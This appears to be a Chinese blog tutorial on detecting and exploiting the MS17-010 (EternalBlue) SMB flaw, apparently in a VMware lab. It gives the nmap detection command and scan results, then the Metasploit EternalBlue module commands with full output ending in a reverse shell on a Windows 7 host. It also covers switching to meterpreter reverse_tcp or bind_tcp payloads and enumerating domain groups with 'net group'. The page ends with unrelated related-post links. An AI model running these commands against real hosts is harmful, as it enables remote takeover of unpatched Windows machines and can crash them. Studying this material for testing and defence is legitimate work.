利用Nmap检测

命令:

nmap -p445 --script smb-vuln-ms17-010 [IP]

# 如果运行报错,可以加个sudo

IP/24 = 8位地址范围,对应的子网掩码简单理解:

ip/24

11111111 11111111 11111111 00000000

2^8=256-2=254(台)

ip/16

11111111 11111111 00000000 00000000

2^16=65536-2=65534(台)

ip/8

11111111 00000000 00000000 00000000

2^24=16777216-2=16777214(台)

打印结果:

x.x.x.x/24 = x.x.x.1~255

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24

Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST

Nmap scan report for 192.168.119.1

Host is up (0.00053s latency).

PORT    STATE SERVICE

445/tcp open  microsoft-ds

MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2

Host is up (0.00014s latency).

PORT    STATE  SERVICE

445/tcp closed microsoft-ds

MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139

Host is up (0.00024s latency).

PORT    STATE SERVICE

445/tcp open  microsoft-ds

MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:

| smb-vuln-ms17-010:

|   VULNERABLE:

|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|        servers (ms17-010).

|

|     Disclosure date: 2017-03-14

|     References:

|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254

Host is up (0.00067s latency).

PORT    STATE    SERVICE

445/tcp filtered microsoft-ds

MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136

Host is up (0.000033s latency).

PORT    STATE  SERVICE

445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

从报告结果可以看出,内网中192.168.119.139这台主机存在ms-17-010漏洞;

MSF反弹SHELL

命令

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 【IP】

run

打印结果:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444

[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.119.139:445 - Connecting to target for exploitation.

[+] 192.168.119.139:445 - Connection established for exploitation.

[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima

[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service

[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1

[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet

[*] 192.168.119.139:445 - Starting non-paged pool grooming

[+] 192.168.119.139:445 - Sending SMBv2 buffers

[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.119.139:445 - Sending final SMBv2 buffers.

[*] 192.168.119.139:445 - Sending last fragment of exploit packet!

[*] 192.168.119.139:445 - Receiving response from exploit packet

[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.119.139:445 - Sending egg to corrupted connection.

[*] 192.168.119.139:445 - Triggering free of corrupted buffer.

[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800

[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]

��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恒之蓝成功!但返回的只是一个cmdshell ;

因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload: set payload windows/x64/meterpreter/reverse_tcp

只要设置rhostsrport就OK了;

exploit 运行,这个时候就反弹的就是一个meterpreter会话 (更强的payload)。

使用正向的payload也是可以的:set payload windows/x64/meterpreter/bind_tcp

注意

有ms17_010漏洞的主机,一般都是旧版windows系统的主机,用攻击模块的时候,可能会导致主机的蓝屏宕机,所以需要谨慎一些。

乱码

有乱码都是因为编码不一致造成的;

成因:

  • Linux下面汉字默认是UTF-8编码
  • Windows下汉字使用的是GBK系列编码

解决方案:

  • Kali下先勾选GBK编码
C:\Windows\system32>net group

net group

\\ �����ʻ�

-------------------------------------------------------------------------------

*DnsUpdateProxy

*Domain Admins

*Domain Computers

*Domain Controllers

*Domain Guests

*Domain Users

*Enterprise Admins

*Enterprise Read-only Domain Controllers

*Group Policy Creator Owners

*Read-only Domain Controllers

*Schema Admins

����������ϣ�������һ��������


chcp 65001


C:\Windows\system32>net group

net group

Group Accounts for \\

-------------------------------------------------------------------------------

*DnsUpdateProxy

*Domain Admins

*Domain Computers

*Domain Controllers

*Domain Guests

*Domain Users

*Enterprise Admins

*Enterprise Read-only Domain Controllers

*Group Policy Creator Owners

*Read-only Domain Controllers

*Schema Admins

The command completed with one or more errors.

参考

https://cloud.tencent.com/developer/article/1541123

https://www.sqlsec.com/2018/03/smb.html

永恒之蓝(MS17-010)检测与利用的更多相关文章

  1. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  2. PCB Windows Petya(永恒之蓝)勒索病毒补丁检测代码

    公司内部电脑招受到新的勒索病毒Petya(永恒之蓝)攻击,直接导致受攻击的电脑系统崩贵无法启动,这次勒索病毒攻击影响范围之广,IT,人事,工程,生产,物控等部门都无一幸免,对整个公司运转产生了非常严重 ...

  3. 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法

    日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell.查看文件.获取密码. 0x01.实验环境 攻击机 系统:macOS Sierra 10.12 ...

  4. Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

    Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索 ...

  5. 微软永恒之蓝ms17010补丁下载-wannacry

    勒索病毒爆发:上百国家遭"感染",Windows勒索病毒恐怖蔓延!勒索病毒,掀起了全球上百个国家.数十亿用户对网络安全的恐慌,微软推出的永恒之蓝ms17010补丁下载专为勒索病毒专 ...

  6. “永恒之蓝"漏洞的紧急应对--毕业生必看

    早上6点多起床了,第一次起这么早,昨天晚上12点多,看到了一则紧急通知,勒索软件通过微软"永恒之蓝"漏洞针对教育网进行了大规模的攻击,而且有很多同学中招.中招后的结果如下图所示. ...

  7. 由"永恒之蓝"病毒而来的电脑科普知识

    永恒之蓝病毒事件: 继英国医院被攻击,随后在刚刚过去的5月12日晚上20点左右肆虐中国高校的WannaCry勒索事件,全国各地的高校学生纷纷反映,自己的电脑遭到病毒的攻击,文档被加密,壁纸遭到篡改,并 ...

  8. “永恒之蓝”(Wannacry)蠕虫全球肆虐 安装补丁的方法

    “永恒之蓝”利用0day漏洞 ,通过445端口(文件共享)在内网进行蠕虫式感染传播,没有安装安全软件或及时更新系统补丁的其他内网用户就极有可能被动感染,所以目前感染用户主要集中在企业.高校等内网环境下 ...

  9. 【研究】ms17-010永恒之蓝漏洞复现

    1       永恒之蓝漏洞复现(ms17-010) 1.1     漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放44 ...

随机推荐

  1. zjnuSAVEZ (字符串hash)

    Description There are eight planets and one planetoid in the Solar system. It is not a well known fa ...

  2. 考研路茫茫——单词情结 HDU - 2243 AC自动机 && 矩阵快速幂

    背单词,始终是复习英语的重要环节.在荒废了3年大学生涯后,Lele也终于要开始背单词了. 一天,Lele在某本单词书上看到了一个根据词根来背单词的方法.比如"ab",放在单词前一般 ...

  3. vs2019 写入访问权限冲突

    先说句题外话 vs反应有时候有点慢,改过的地方等几秒才会显示正确 另外有时候正确的地方会报错,重启吧 回到正题 "引发了异常: 写入访问权限冲突._Left 是 0xCDCDCDCD.如有适 ...

  4. 2017CCCC决赛 L1-3. 阅览室

    L1-3 阅览室(20 分) 天梯图书阅览室请你编写一个简单的图书借阅统计程序.当读者借书时,管理员输入书号并按下S键,程序开始计时:当读者还书时,管理员输入书号并按下E键,程序结束计时.书号为不超过 ...

  5. codeforces 3D (非原创)

    D. Least Cost Bracket Sequence time limit per test 1 second memory limit per test 64 megabytes input ...

  6. 手工数据结构系列-C语言模拟队列 hdu1276

    #include <stdio.h> #include <stdlib.h> #define init_size 1000 typedef struct { int head, ...

  7. 2021-2-18:请你说说MySQL的字符集与排序规则对开发有哪些影响?

    任何计算机存储数据,都需要字符集,因为计算机存储的数据其实都是二进制编码,将一个个字符,映射到对应的二进制编码的这个映射就是字符编码(字符集).这些字符如何排序呢?决定字符排序的规则就是排序规则. 查 ...

  8. js load more select

    js load more select searchable scroll load more append to list refs xgqfrms 2012-2020 www.cnblogs.co ...

  9. postman skills

    postman skills variables https://learning.postman.com/docs/sending-requests/variables/ https://learn ...

  10. WebGL Programming Guide All In One

    WebGL Programming Guide All In One WebGL WebGL Programming Guide All In One Publication date: July 2 ...